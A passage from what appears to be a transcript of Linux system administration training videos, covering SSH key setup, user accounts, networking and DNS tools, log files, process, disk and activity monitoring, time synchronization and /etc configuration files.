services and explore the system configurations in the /etc folder of a Unix system.
[Video description begins] Topic title: Remote Shell Access. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to connect to a remote server using SSH. So SSH stands for Secure Shell.
So you're connecting to a remote computer and typing commands, as if you were connected directly to it
physically with a monitor and keyboard. I'll talk about some considerations for making sure your SSH
connections are indeed secure.
[Video description begins] A blank terminal window displays. The menu bar displays the following six options,
namely: File, Edit, View, Search, Terminal, Help. The control buttons to "Minimize", "Maximize" and "Close"
the window display at the top right. [Video description ends]
So if I want to connect to a remote computer, I type ssh followed by the username. So that my remote
computer's username is [email protected]. Now the first time I connect, it's going to tell me that the
authenticity cannot be establish. And it gives me a key fingerprint, an ECDSA key fingerprint in SHA256
form. So it has this yzb0Rph, etc. So it says do you want to connect, are you sure you want to continue
connecting? Well, typically, you type yes and assume everything is fine. Now if you want to be completely
sure, you can go to the remote computer physically and double-check this key fingerprint. So I'm going to
bring in the actual terminal window from the computer I'm recording on, the computer we're trying to connect
to, and
[Video description begins] A blank terminal window titled "bash" appears over the terminal window. [Video
description ends]
do a key scan to determine if the fingerprints are indeed the same. So if the remote computer shows one
fingerprint, and the local computer that we're connecting to shows a different one, then somebody is likely
eavesdropping in the middle of the connection and performing a man-in-the-middle attack.
[Video description begins] He enters a command in the "bash" window. [Video description ends]
But if we do an ssh-keyscan -t in ecdsa form, so we need to have the same key fingerprint signature or the
same algorithm. And then we're doing it on the local computer, so localhost. We want to redirect 2, so
2>/dev/null. So this redirects any standard error output to dev/null, because we don't want to include it in the
key signature. So then we pipe that into ssh-keygen -C sha256, so we're using the same fingerprint signature, -
lf. And since we're using the standard output, we put a hyphen at the end for the file name.
[Video description begins] He presses enter after writing the command in the "bash" window. [Video
description ends]
And if we look at the signatures, just looking at it, yzb, yzb. They both start, they both have the exact same
signature.
[Video description begins] He minimizes the "bash" window. Now, the previous terminal window displays on
the screen. [Video description ends]
So we can select yes, we want to continue connecting. And it tells me that we've permanently added
192.168.2.20, the ECDSA signature, to the list of known hosts. So since we've established the authenticity, we
don't need to do it again. And it tells me that there's a broken pipe. We took too long to perform the
connection, so it aborted partway through.
[Video description begins] He enters the following command: ssh [email protected]. [Video description
ends]
But now, when I connect, it just asks me for a password. So I can type in the password, and now we're
connected to the remote computer. Now hit exit on the remote computer. So we're connected to a remote
system as if we were running commands locally. But I'm just going to exit and logout of that connection, and
now our prompt goes back to our local machine. Now another way we can do this and make this connection is
to create a key, a public/private key pair, and share our key with the remote system. So any future connections
are, we don't need to type in the password every time. We've already shared our key, so that it can verify our
identity.
So if I do ssh-keygen -t, let's make an rsa key, and then -b of 4096 bits. So it creates the public/private key
pair. Give it the default name, the id_rsa. And now, if I do ssh-copy-id to that previous connection,
[email protected], I put in my password, and now it copied the key. Now if I do ssh [email protected],
it connects without asking me the password. And if I type uname, it shows me that the local system is Darwin,
which is the underlying operating system in MacOS. So we're connecting to a Mac computer.
Now if I exit out of that system again, I want to show you one more thing. We can actually execute commands
remotely through SSH, and get the results locally. So this is very handy when you have to administer remote
systems. So if I type ssh [email protected] again, with a space, and then in quotes, I type a command. So
let's say uname, and it returns Darwin, the same thing as if I ran it locally on the remote system. And that
concludes this demonstration of remote shell access using SSH.
In this video, you will learn how to create, modify, and delete user accounts in a Linux system.
Objectives
[Video description begins] Topic title: User Accounts. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to create, modify and delete user accounts on a Linux system. So by default,
I don't have privileges to run the Add User command. I either need to be a root user or need to be able to
escalate or elevate my privileges to run the command. So since I'm logged in as my account Steve, I use the
sudo command spelled
[Video description begins] A blank terminal window displays. [Video description ends]
sudo, and then adduser. And then I type the user name I'd like to create. In this case, I'll create an account for
Bob. Now it asks me for a password for my local account because I'm going to escalate my privileges to run
the Add User command. So I type in my password. So it creates a basic directory structure, a home directory
for Bob, with a new group, Bob and a new user Bob. And it says copying files from /etc/skel. So this is the
basic skeleton they call it of Bob's profile. So it creates Bob with the basic profile and we assigned Bob a
password and it tells me it's a bad password. So let me put in something a little better. And now we can put in
some information for Bob, we can put a Name, a Room Number, a Work Phone. Whatever we'd like to put in.
And then once the information is correct, the user Bob has been created.
[Video description begins] The other two pieces of information credentials are titled: Home Phone and
Other. [Video description ends]
Now we can check Bob by typing id of bob. So it gives me the user id of bob, Bob's group id, and what groups
bob belongs to. And by default, Bob only belongs to his own group. Now we can run the sudo usermod
command. So this is to modify user and one of the options -a for add uppercase G for group, and then we type
sudo. So we're going to add Bob to the sudo group. So Bob will be able to run sudo commands and run
commands as root. So we'll type Bob, his username, and now if we type id of Bob again we see that Bob now
belongs to the sudo group. Now we can log in as Bob by typing su for switch user, the hyphen, and then Bob.
So the hyphen ensures that we log in as Bob using Bob's own bash environment.
And now we're logged in as Bob. And if we type ls, or ls -la to see everything in Bob's home directory
including hidden files like the bash_logout, .bashrc and .profile. So Bob's account is created with a few basic
files to define his local profile. We want log out of Bob, we type exit again and from the prompt you can see
we were connected as Bob@vm1. So this local computer is called vm1. So when we use su we switch from
Steve, to Bob. And then back to Steve again when we run the exit command. Now if I want to remove Bob, I
can do sudo userdel Bob. And this deletes Bob's account, and he's no longer in the system. Now if I type in
ls /home,
[Video description begins] The screen displays the following two results: bob, steve. [Video description ends]
you'll see that Bob's directory was not deleted even though his account was. So if there are any files that need
to be retrieved or backed up or saved from Bob's user folder, his home folder, then we can do that before
removing the folder entirely. And that concludes this demonstration of user accounts in a Linux system.
[Video description begins] Topic title: IP Routing. Your host for this session is Steve Scott. Screen title: Data
from Host to Host [Video description ends]
In this video, I'll identify and describe the elements of Internet protocol routing, or IP routing, which includes
packets, routers, gateways, addresses, and routing tables. And I'll describe how it all fits together from a high-
level perspective. So we're talking about communicating over a network, passing data from host to host and
back again across cables and through routers, from a source to a destination. Establishing those connections are
not unlike getting from point A to point B in a car, going from one street address to another. We use maps and
follow a path, turning at appropriate intersections and getting on and off highways at the appropriate locations.
Passing data across the Internet is somewhat similar.
And when it comes to the Internet, we say we're going from one host to another. Where a host is just a
computing device connected to a network that responds to or serves requests. So we first have to start with a
way of uniquely identifying a computer on a network. With the massive size of today's Internet, it seems like a
daunting task to route information from one computer to another computer all the way around the world. Not
unlike the postal service or postal addresses. Instead of country, region, city, street, we use a MAC address. A
Media Access Control address or identifier. And we use a NIC, a Network Interface Controller address. This
provides our data link through Ethernet, through a connected cable or Wi-Fi for wireless communications in
most IP networks.
[Video description begins] Screen title: Routing Addresses [Video description ends]
So conceptually, when we're talking about how computer networks route data to the intended address, we need
a local network or a subnets, where everything sits behind a local router. When we're sending packets to an
intended destination, through the local network interfaces, we need to go through a gateway to determine what
needs to be done. Where the data needs to go, whether they're being sent to a local address, or whether the
gateway must route the data to another network, to transmit and receive from external sources and not just
within a local subnet.
Now for IP addresses to be specific IP version 4, the addresses look like the form 192.168.2.101, for example.
So there are four three-digit numbers, and the numbers are between 1 and 255. Where the gateway typically
sits on a router or a small computing device, either with antennas for Wi-Fi or a bunch of Ethernet ports with
individual cables plugged into them. And most often the IP address for our routing device for our gateway ends
in a 1, but not always. So, when we have a gateway, the typical address, in this case, would be 192.168.2.1, but
not always. We also have a local Netmask to determine the size or IP range of our local subnet.
In this case in this example, we would have a netmask of 255.255.255.0. So everything that starts with the
192.168.2 portion of the address is on the local subnet. And the last number varies. So we could have 254
possible hosts on the local network. And any addresses outside of that range get routed by the gateway to
whatever's upstream, such as our Internet service provider. And then our Internet service provider routes the
traffic for different IP addresses based on this sort of hierarchy. So in terms of the larger Internet, there's a
hierarchy of routing tables that determine where to send packets. We have the ARP table or address resolution
protocol table, which is part of mapping for the IP addresses to MAC addresses.
We have the Mac table or content-addressable memory table or CAM to determine where traffic needs to go
on a local network or Ethernet frame. So in general, when we refer to the routing table, we're talking about a
router's network interface table which has information about hosts on the network. Such as what I
demonstrated in the video titled Network Interfaces using the ifconfig command. So the routing table contains
network identifiers, destination of where the data should be transmitted. Metrics about the cost of the intended
route so that it can be sent efficiently, and address information about the next hop in the network from router to
router of the networks we're transmitting data to.
So it's very easy to get lost in the details of how this gets implemented. In most practice, when managing a
network, routers, and servers, or host computers on the network, the high-level picture of network addresses or
IP addresses, gateways and netmasks are enough to get started with and get a sense of how data is transmitted
from source to destination and back again. And that concludes this presentation on IP routing.
After completing this video, you will be able to describe the elements of a network interface using the ifconfig
command.
Objectives
[Video description begins] Topic title: Network Interfaces. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll describe the elements of a network interface using the ifconfig command. So most often I use
the ifconfig or ifconfig, to view the information about the network interface configuration. So ifconfig is short
for interface config. It also provides a way of configuring a network interface. But unless you're configuring a
router, or your PC or workstation is operating under some special network circumstances.
You rarely need to manually configure it using ifconfig. It's often the case that our local network router will
assign address settings for us using the Dynamic Host Configuration Protocol or DHCP. So we're talking about
configuring or viewing the configuration of a software interface. That either connects to the physical interface
of the network controller hardware. Or to some virtual interface like the loopback bridge or virtual LAN
interface for software-defined networks.
[Video description begins] A blank terminal window displays. [Video description ends]
So let's run the ifconfig command, and we'll see the results. So I'll start with the second entry, where it has lo.
So in this entry, it's the loopback address. So this is the loopback interface that's used as a virtual interface for
local communication within this computer itself. Even if there's no network card or Ethernet, this local
interface is still available. And we access it using the 127.0.0.1 IP address. Which is mapped in the etchost
folder as localhost. So if I ping this interface 127.0.0.1, locally I'll get a response. Now, I'll clear this window
and I'll run ifconfig again.
And let's talk about the Ethernet adapter, or the Ethernet interface. So we typically see Ethernet interfaces
starting with the letter e. Most frequently with eth0, or em0, or in this case I have enp0s3. So let's start with
some of the options. So we have things like the inet address, which is the version for IP address, in this case
192.168.2.63. Which is what I use to access this computer or reference it locally on the local subnet. We have
the net mask or network mask for this subnet, which is 255.255.255.0. We have the broadcast address,
192.168.2.255. And then we have the inet6 equivalent, so the IP version 6 address.
The ether is the MAC address for our hardware. The mtu up at the top is the maximum transmission unit in
bytes. And the default, and which is almost always set to in modern hardware is 1500, for an Ethernet
interface. A few other things that you should be aware of is the RX packets. So this is the received packets, we
have RX errors for received errors. The dropped packets, the overrun, so the received that experience buffer
overruns. The number of misaligned frames, so this is an error condition if the frame is set. Then we have the
transmission packets, the total transmitted, the number of bytes, and then the transmission errors or overruns.
The dropped packets, the carrier, so these are loss of carrier, errors, and the Ethernet collisions. So there's a fair
bit of information here that we have available when we run ifconfig, and we get a snapshot of it each time.
Now in some Linux systems, there is an alternative to ifconfig which is the ip command. If you type ip space
address, you get some of the same information, but we don't get the received and transmit info. When we type
ip address, we just get the interface details. And that concludes this demonstration of network interfaces.
In this video, find out how to perform Domain Name System lookups.
Objectives
perform Domain Name System lookups
[Video description begins] Topic title: Domain Names. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to perform domain name system lookups or DNS searches. The simplest
form of a DNS lookup is to translate a domain name into an IP address. And the reverse is true as well. We can
take an IP address, and often return an associated domain name, or multiple names associated with an IP
address. Of course it is the case where many names, many DNS entries domain names can point to a single IP
address.
[Video description begins] A blank terminal window displays. [Video description ends]
So let's try one. Let's do host of example.com. So it returns an address. The IP version 4 address in this case is
93.184.216.34. And it has an IPv6 address, and it has example.com mail is handled by 0 and then period. So it
doesn't really have a mail entry. We could try another host. Let's try host cbc.ca for the Canadian Broadcasting
Corporation. Now it has a little bit more information and it has an address, so an IP address. And then it has
some mail servers, the aspmx.l.google.com addresses, which are common when it uses Google services to
handle its email. We can also show a complete entry with all records using host -a of cbc.ca. Now let's try a
host query by putting in the IP address. So cbc.ca has an address in this case of 23.14.157.242. I'm going to
copy that.
[Video description begins] He selects the address and right clicks over it. A drop down menu with the
following options appears, namely: Open Terminal, Open Tab, Copy, Paste, Profiles. He selects the option:
Copy. [Video description ends]
And now I'm going to type host and paste in this IP address. And it gives me something else. It gives me this
IP address .in-addr.arpa. So arpa currently stands for address and routing parameter area. And this points to
this long address with the a and 23-14-157-242.deploy.static.akamaitechnologies.com. So the IP address
doesn't actually point back to cbc.ca. It points to another host, and this is likely a service provider or data
center host, the provider Akamai that handles web hosting for the CBC. We can also narrow our searches, our
requests to specific DNS records, such as MX for mail exchange, NS for name servers, text records, or SOA
records for start of authority records.
So let's try some of those now. So we'll do host-t MX and cbc.ca. So it only returns the mail service entries.
We could do the same thing with the name servers doing host -t ns and cbc.ca. And it shows the name servers,
so these servers with .akam.net. Again, this corresponds to the akamaitechnologies.com, so it's likely they are a
service provider. We can see that text records host -t txt, with cbc.ca. And it shows us some text records that
are defined. And finally, let's look at the host -t SOA of cbc.ca. And it gives us an SOA record with the
appropriate information.
Now various applications or service providers use the various records, especially the mail servers, to determine
mail services. The text records are often now used for verifications, either sight verifications or mail's
keysigning, like the DKIM signature or the SPF signature, which we get in the output of the text record. So
these are some of the basics for performing DNS or Domain Name System lookups from Linux. And that
concludes this demonstration
describe the important log files on a Linux system that are used to monitor for critical events
[Video description begins] Topic title: Log Files. Your host for this session is Steve Scott. [Video description
ends]
In this video, I'll describe the important log files in a Linux system to monitor for critical events. Now this may
vary from distribution to distribution, from Linux to BSD or other Unixes, but in general, we have our log files
in the /var/ log file.
[Video description begins] A blank terminal window displays. [Video description ends]
So I'll run ls on this folder now. And we can have a look at some of the common ones and some of the ones
that you should look for and why you should look at them. So one is boot.log. So this one is for boot messages,
including init script messages, anything gets logged here from those startup processes. This is important to
investigate when you get unexpected reboots or boot failures that occur. We have the fail log. So these are
failed logins or failed login attempts. It's good to check and to look for unusual login attempt activity and why
they're failing. In the apt folder, so I'll do an ls/var/log/apt.
This gives us a log of upgrades, including unattended-upgrades that happen especially for automatic security
updates. So if you ever experience system instability, or application instability, and it's not caused by any other
changes in the system. It could be caused by an upgrade, and you could track it down here as a potential
source. We also have the fail2ban.log. Now this is specific to the fail2ban intrusion prevention system. This is
especially important when you have a situation where there's too many failed SSH attempts. So someone's
attempting to SSH and connect and login remotely.
This intrusion prevention system or IPS can block or ban or set a long timeout before it allows another attempt.
So we can see what attempts are made and blocked. And this is effective for investigating attempted intrusions.
In the nginx folder we have the webserver logs. It's obviously important if you're serving HTTP content. And
this also depends on the webserver. You could have an HTTPD folder or Apache folder as well, depending on
the type of webserver you're running. There's also the syslog.
Now this can be used by various system services and application services. It's quite often used by services like
the crontab. And it's a standard logging mechanism with the standard logging format. Quite often when I've
created web services or web apps or APIs in the past, I logged them to the syslog. So depending on what's
running and what choices are made in terms of logging, the syslog can contain a wealth of information. And
the other one here we have that's very important is the auth.log. All authentication and escalation of privilege
events like root logins or commands run as sudo. Anything related to failed authorization attempts get logged
here.
Now a few that aren't here are the messages quite often in different Unix and Linux systems. We have a
messages log for system log activity for informational messages and non-critical information. Another one that
I don't have here is the dmesg log. Where there's device or physical hardware messages, drivers, kernel ring
buffer logs, hardware errors, they get logged in dmesg. And another alternative to the auth.log is the secure log
file. This comes up more often in Red Hat or CentOS Linux distributions. So monitoring log activity can be a
time consuming task, but it's the first line of investigation for system errors and for threats and breaches. And
that concludes this demonstration of log files.
In this video, you will learn how to use the ps command to get process information.
Objectives
[Video description begins] Topic title: Process Reporting. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to use the ps command to get process information. So I've covered some of
the basics of ps in the video titled, Process Management. But here I'll go deeper into some more options of the
PS command. And ps does have many options. Even though in most cases we use ps with the -e switch or the
ef switch, then pipe it into grep to find what we're looking for. There are many other options that make it a
powerful tool when we know what the capabilities are.
[Video description begins] A blank terminal window displays. [Video description ends]
So how I typically use it quite often I'll do ps -ef | grep and then I'll put in a process name. So let's say nginx
for the web server.
[Video description begins] The process name is placed inside the double quotation marks. [Video description
ends]
And we here we have some worker processes, and a master process for the nginx web server. We can also use -
A to show all which shows some of
[Video description begins] He enters the following command: ps -A. [Video description ends]
the same information, but here it gives us the entire list. So I have all of that in this list and if I pipe this into
grep nginx, I get similar information but
[Video description begins] He enters the following command: ps -A | grep "nginx." [Video description ends]
I get the condensed version of the process name. So we don't see that, which one is the worker process and
which one is the master process. So only the child processes and not the parent process. Now if we only want
to see the child processes, we could do ps -d, and pipe that into grep nginx.
[Video description begins] nginx is placed inside the double quotation marks. [Video description ends]
And here two of the processes are child processes, so the one with 814 and 815 as the process IDs. And the
813 is obviously the parent process or the session leader as it's sometimes called. If we want to see only the
session leader, we could use ps -d -N for negate so it's the opposite. So I'll pipe that into grep nginx and we get
the other one. So we get the child processes with -d and -d -N we get the parent process or the session leader.
We can see the current terminal processes just by doing ps of uppercase T. So it shows the local, it shows the
ps command I just ran and the bash shell itself. We can do ps r to get the running processes, and when I run ps
r that's the only running process in this case. If I go into another terminal window, I tab over and let's do a ping
of localhost.
[Video description begins] He switches back to the previous terminal window. [Video description ends]
And now if I do ps r, it still gives me the same thing because this is running on a different terminal. So I'll
Ctrl+C. So it's only running processes within the current terminal. I can actually look by process ID. If I do ps -
p I can specify a process ID, say 813. And it will return the nginx process with 813. I can now put it in a list. I
can see if, let's say, 814 and 815 are running. So in double quotes, I put 814 space 815 and it returns those two
processes. We can do it by user, let's say ps U and then in quotes www-data. And that shows that the php-fpm
and the nginx worker processes are all running as the user www-data. We could do ps U of route and see what
it's running as root.
[Video description begins] root is placed inside the double quotation marks. [Video description ends]
And of course, there are quite a few. And we could look at the local users, ps U of steve space bob. And we put
these in quotes. So we have a list of users where we can see all of the processes belonging to those two users.
Now there's a lot of information shown here. So I've just cleared the terminal window. And I'm going to run a
formatted ps command. So ps -e. Now we don't specify f because we don't want the full format. We want to
specify it for ourselves. So --format=pid and cmd in quotes. And now I'll pipe this into grep with nginx.
[Video description begins] nginx is placed inside the double quotation marks. [Video description ends]
And we get the process IDs and the process names, the commands, but nothing else. So those are some of the
various options we have with the ps command. And there's quite a lot we could do with it to narrow down what
process we're looking for, and filter it by various criteria. And that concludes this demonstration of process
reporting.
query disk space use, partition information, and directory contents of a Linux system
[Video description begins] Topic title: Disk Use. Your host for this session is Steve Scott. [Video description
ends]
In this video, I'll demonstrate how to query disk space use, partition information, and directory contents of a
Linux system.
[Video description begins] A blank terminal window displays. [Video description ends]
So to get the amount of space free, the disk free is the df command. So it gives us a file system, the amount of
1K-blocks, the amount used, and the amount available and the use percent. And then it shows where it's
mounted on the file system. Now some of these file systems or devices are not necessarily hard disk space.
Some of them are loop devices like /dev/loop, followed by a number which are pseudo-devices. So we don't
really address those or store information there. But other devices, like /dev/sda1, represents our main hard disk.
Now, it's showing a use of 33% and it's showing these 1K-blocks with these fairly large numbers. Now we
don't really think of these as human-readable numbers. But there's an option for that. So we can type df -h for
human readable. So it will give us the unit, whether it's megabytes, gigabytes, or kilobytes depending on the
device and how much space there is and how much is available. So we see that /dev/sda1 is a 20 gigabyte disk
or has 20 gigabytes of space. We've used 6 gigabytes, 6.0 gigabytes. And there's 13 gigabytes available
roughly. Now, for querying our disk free visually ourselves, so that we can interpret it, a human readable
makes sense.
But if we're writing scripts or programs that use this information to make decisions, say, when the disk is
almost full and we need to notify somebody, we should use the regular output, and not the human readable
version. We can also do the same thing with disk usage. So if we need to track down what directories or files
are using up the most space, we can use the du command. Now in my home folder there is a lot of files here.
There's files that are settings for various programs. There's files that are stored in the desktop, in the
documents, in various folders. And it's not always easy to track down what we should be looking for.
Now, any folder or file that begins with the period is a hidden file or folder. And we can actually exclude those
if we put in the right option. So let's do du -h for human readable just as we would with disk free. And we're
going to do --exclude, and we'll specify in "./.* and then we close the quotes. Now if I run this it simplifies it.
So it still has some fairly long directory with all of the files in those directories and how much space they're
using. But all of the hidden ones are not being shown. We can simplify this a little further by specifying
another command --max-depth, and we set that equal to 1.
[Video description begins] He edits the previous command which now reads as: du -h -- exclude = "./.*" --
max-depth=1. [Video description ends]
So it'll only look at the top-level directories. And in this case, we have snap, Downloads, Public, Documents,
Desktop, Music, Videos, Pictures, and Templates. And if we'd like to see which one is using the most, we just
look down the leftmost column, and we can see there's 20K and 4K. Some of these directories are empty or
almost empty, except for this Desktop one, which is taking up 20 megabytes, or 20M. Now we can also look at
a higher level.
So we don't have to just look in the current folder. We can specify a folder. So let's do du of --max-depth=1 /.
So we're going to look in the root folder. So we'll run this command, but it gives us lots and lots of errors or
permission denied problems. And it really clutters up the output. Now we can redirect these error messages to
standard error. So we'll type 2 greater than, so we're redirecting it to /dev/null.
[Video description begins] He enters the following command: du --max-depth=1 / 2>/dev/null. [Video
description ends]
And that makes it even easier to read. And we could even put in the -h in here to make it human readable.
[Video description begins] He edits the previous command which now reads as: du -h --max-depth=1 /
2>/dev/null. [Video description ends]
And we can see where the space is being used on our system in each of the main folders. And if we go down
the list we can see the most use, so the 1.1 gigabytes in this /var folder, 14 megabytes in /etc, 3 gigabytes
and /usr. In the home folder where the documents are, there is 59 megabytes being used. So we can analyze
and track down disk usage. We can do it human readable so that when we run the commands, we can quickly
make sense of it by looking at the units, the megabytes, the kilobytes and the gigabytes. So we can easily see
where that data is coming from or we can use it without if we want to use a script to interpret the numbers.
Now one more command I'm going to write is for partition information.
For that, we use fdisk and we use -l, for list. Now in this case, it does it gives me permission denied because
we need to have privileged use to look at partition information. So I'll run this again with sudo. And here we
get information. So we have all of the disks with /dev/loop, which we can ignore if we're just looking for hard
disk space or hard drive partition information. So it gives some information in /dev/sda. It tells me that it's 20
gigabytes and it shows how many bytes and how many sectors. It says the disklabel type, in this case it's
labeled as dos. It has identifier. And then it shows the device whether it's a boot device, so it has an asterisk,
yes it is the boot device where it starts, where it ends in terms of sectors, and its size, its ID and its type. And
that concludes this demonstration of querying disk use.
[Video description begins] Topic title: User Activity. Your host for this session is Steve Scott. A blank terminal
window displays. [Video description ends]
In this video, I'll demonstrate how to monitor user activity analytic system. So the first command to check user
activity is the who command. And this gives us information about who's currently logged in and as well as
their most recent login. So in this case, I have two users, Steve and Bob. And Steve logged in the year 2020,
the third month, so March 23, at 10:37. And Bob logged in on the same date at 15:41. So at 3:41 in the
afternoon. Now similar to the who command, but with a bit more information, including the idle time, CPU
use, and the type of terminal session, is in the W command.
So it gives us the same information with a login time but not the date in this case. The idle time, the CPU use,
the CPU average, and how they're logged in. This mate-session is the desktop environment that the user is
using, in this case the mate desktop. We can also use the last command called last. This gives us the list of
recent logins, the date and times of those logins and how long each of these sessions have lasted. Now the most
recent ones at the top give us pretty much the same information or very close to the same information as the
who and W commands.
So we get Bob and Steve the tty numbers 8 and 7. We get the date and time, we get something like gone, no
log out, still running. So for the latest session, we get some information where there's no logout. And in our
other sessions, it shows the logout time, and how long the session lasted in the number of hours. Now one
more thing to monitor user activity is the history command. Now if I do history on my local user, it gives me
quite a long history of commands that I've run recently. So in this case, if we look at the number, there's over
2,000 commands, but that's fine for seeing my own history. I'll hit clear.
If I want to see the history of another user, say I'm logged in as Steve, but I want to see Bob's history, I want to
see what Bob is doing, well, a few ways I can do that. One is I can switch to Bob's account using su- Bob. And
if I know Bob's password, I can log in. Or if I use sudo, I can connect as Bob and do a history command. But if
I run commands logged in as Bob, it saves those commands in Bob's history. If I just want to see what's in
Bob's history, I can actually use the cat command and then home/bob/.bash_history. I can see what commands
that he's run. But of course, this is a protected file.
[Video description begins] He enters the following command: cat /home/bob/ .bash_history. [Video
description ends]
So as a regular user, I don't have access to see the history of another user's account. And that's actually a good
security measure. If I want to see the user activity for Bob, I need sudo privileges or root privileges.
[Video description begins] He edits the previous command which now reads as: sudo cat
/home/bob/ .bash_history. [Video description ends]
So if I run it as root, I can see that Bob's recently run ls, ls -la and the exit command. So if there's any
suspicious activity, any suspicious commands being run, we can see that activity in the history file in it in
Bob's bash history. And that concludes this demonstration of looking at user activity in a Linux system.
[Video description begins] Topic title: System Activity. Your host for this session is Steve Scott. A blank
terminal window displays. [Video description ends]
In this video, I'll demonstrate how to use system monitoring tools to monitor Linux activity. So the first
command I'm going to run is uptime. So this displays a line including the time, the uptime. So how long it's
been up for, the length of time the system has been running since the last reset or reboot, as well as the number
of logged-in users, and the load average system load. Now another command we often run to monitor is the top
command. So this shows us, well, some of the same information we had in uptime on the first line and we get
the number of tasks total the number of running, sleeping tasks, the stopped tasks and the zombie tasks.
And you'll notice as we're watching this, this is constantly updating. So it's much like the Activity Monitor in
Mac OS or the task manager in Windows, but it's done here in this command line application. We also get the
percent of CPU use, the memory use in kilobytes. So the total the free the use, as well as if we're using any
swap space. Now we can also toggle this summary info. if I press the T character, I can toggle the CPU section
off. If I use the M key, I can change the display of the memory use until it disappears.
And I can also interactively select the ordering of the various columns. So if I press F, I can pick the column
based on a certain criteria, let's say by memory use. So if I hit Enter, then Q it goes back to the screen with the
sorting done by memory. And so if I hit Q, I quit out of the top command. Now I can also check the free
memory from the command line using the free command. Or using the -h for human readable, like we do in
other commands like df and
[Video description begins] He enters the following command: free -h. [Video description ends]
du that I demonstrated in the video titled Disk Use. And in human-readable form, it shows the number of
gigabytes. So I've 3.9G available, 569M used, and 2.1G free. And it shows shared memory, buff/cache
memory, and available memory. Another command we use to monitor system activity is the netstat command
to get a snapshot of network statistics. So it's a monitoring tool for network connections. And it's quite
frequently used for the TCP and UDP connection information. So if I type netstat- atu, it gives me the TCP
connections and the UDP connections.
And these are active services that are running on various ports. So I have http and printing with ipp and domain
Services, etc. So they're all listed here in these connections. Now I can also put this behind the watch
command. So if I do watch of netstat -atu, it will sit here and refresh it every two seconds. And now, if I switch
over to another terminal window, and let's type something that'll make an outgoing connection. Let's do a sudo
apt update.
And while this is working, if I switch back and watch, it'll show the connections show up each time it updates.
So it made a few connections and they appeared here in the netstat monitor. So this is just one way, one easy
way of monitoring for network connections. And that concludes this demonstration of system activity
monitoring.
During this video, you will learn how to configure time servers and set the correct date, time, and time zone on
a system.
Objectives
configure time servers and set the correct date, time, and time zone on a system
[Video description begins] Topic title: Time and Date Services. Your host for this session is Steve Scott. A
blank terminal window displays. [Video description ends]
In this video, I'll demonstrate how to configure time servers and set the correct date, time, and time zone on a
system. So let's start with the date command. So, if I just type in date in the terminal window I get the current
date. I get Tue for Tuesday, March 24 at 00:51:08 ADT 2020. So this is in the typical format we'd see or the
RFC 2822 format I believe. We can also change this format if we just want to get the time, we can put +%T,
and it will just give us the time. Or date -u. Similar to the format it just running date directly, it gives me the
same date but in the UTC time. Now if I type date -I, it gives me just the local date.
So this is the date in the ISO 8601 format. So with the four digit year- the two digit month with the leading 0,
and the two-digit year, also with a leading 0. If I type date -Ins, it's going to give me the same information but
to a resolution of nanoseconds. So we get the date, a T character, the time, the full time, comma, the full
resolution in nanoseconds. So 13.770577448 nanoseconds. And then the time zone, the -03:00, so negative
three hours is the time zone. So this is the ISO 8601 format. Now if I don't need the nanoseconds I can just
give the command date hyphen uppercase I and a lowercase s and it gives the same information but to the
resolution of seconds.
Now we can also synchronize the date and time using the timedatectl command. So in Ubuntu or Debian based
systems, this is a command used rather than the NTP, the Network Time Protocol program or the NTP date
program. So if I run this, it gives me the Local time, the Universal time, the RTC time. And the current Time
zone I'm in America/Halifax. So this is Atlantic Daylight Time. So, -3 hours. Is the System Clock
synchronized: no. Is the systemd timesyncd service active: yes. So it's synchronizing it with the time server
and RTC in local timezone: no. I'll do a cat in /etc/systemd/timesyncd.conf.
So in this, it has the information about the time synchronization. So we can put in our own NTP server if we
want, instead of using the default. Where in this case, the defaults are shown. So the current default is
ntp.ubuntu.com. If I'd like to change this, I can open this with nano and I believe I need to do that with sudo
nano /etc/systemd/timesyncd.conf.
[Video description begins] The command reads as: sudo /etc/systemd/timesyncd.conf. [Video description ends]
So I'll go down to the NTP line and I'll change this to pool.ntp.org so that will select a near NTP server to
synchronize and the fallback NTP. I can leave it as ntp.ubuntu.com. So I'll do a Ctrl+O to write out an exit.
And now I can do sudo systemctl restart. So we want to restart the service with the new settings, we'll do
systemd-timesyncd.service, and I need to spell that correctly. timesyncd.service, and we've restarted the
service. And so now it's going to use our new settings in the configuration to use the NTP server of our choice.
And that concludes this demonstration of time and date services.
Upon completion of this video, you will be able to describe important system configurations found in the /etc
folder of a UNIX-based system.
Objectives
describe important system configurations found in the /etc folder of a UNIX-based system
[Video description begins] Topic title: /etc Configurations. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll describe important system configurations found in the /etc folder of a Unix or Linux based
system. So the /etc folder contains program and system wide configuration files. So configuration files that are
not user-specific. So any applications, programs, or system wide commands or settings, are typically defined in
/etc.
[Video description begins] Screen title: Tabular Configurations [Video description ends]
For user-defined or user-specific configurations, they're usually found in the user's home folder. One class of
configuration found in /etc are tabular configurations. Those are like ones found in the /etc/inittab, where we
have startup service initialization info, the inittab is one that's specific to the system five or system v service,
and its service. In Ubuntu Linux, the upstart service replace this for a while. And now, system D manages the
boot process and what services to run and now what run level replacing inittab.
But many Unix is still used the inittab tabular configuration. We also have the crontab in /etc/crontab. So these
are a table of scheduled tasks or jobs that run on a periodic timer. And we also have the fstab, so /etc/fstab for
file system tabular configuration. So these are file system mount points. So hard drives, SSDs, or any disk
media that is connected and automatically mounted or mapped in the file system is defined in this file. So these
are the file system mount points.
[Video description begins] Screen title: Run Commands (rc) Configuration [Video description ends]
We also have the run commands or rc commands. So these configurations are suffix or prefix with rc. There's
input rc in /etc/inputrc for readline configuration. So when a shell script stops and prompts for input, this
configuration is defined here. We also have the /etc/rc.local, so this stops and starts services. And we have
this /etc/rc.sysinit, so this is for system initialization task.
[Video description begins] Screen title: Important Configurations in /etc [Video description ends]
Now, what are some other important configurations in /etc? Well, we have the sudoers file, so the sudo
configuration for how the program sudo is run. So a regular user account can run with root privileges or run a
single command as a root user. We have the /etc/init.d. So this typically starts services or local applications on
many Unix or Linux systems.
And the /etc/default folder contains some default configurations that we can use to reference. And the
/etc/hosts file, so this defines host names and their IP addresses often on the local network, especially ones that
can be resolved before DNS services are needed. It can also be used to override DNS entries from external
sources so you can define the IP address and host name mappings locally.
[Video description begins] Screen title: Getting Help (man pages) [Video description ends]
